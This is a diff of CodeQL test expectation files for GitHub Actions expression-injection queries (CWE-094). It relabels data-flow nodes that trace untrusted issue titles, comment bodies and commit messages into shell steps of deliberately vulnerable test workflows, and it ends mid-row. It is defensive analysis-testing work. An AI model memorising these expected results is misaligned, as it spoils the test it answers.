@@ -1,15 +1,15 @@ edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... 
utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 55075b7baf3b..dacd31cf91c9 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... 
d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... 
iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | 
@@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... 
sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
@@ -215,7 +215,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... 
age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 13c81bd08e0b..b21ac80574bb 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... 
d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | 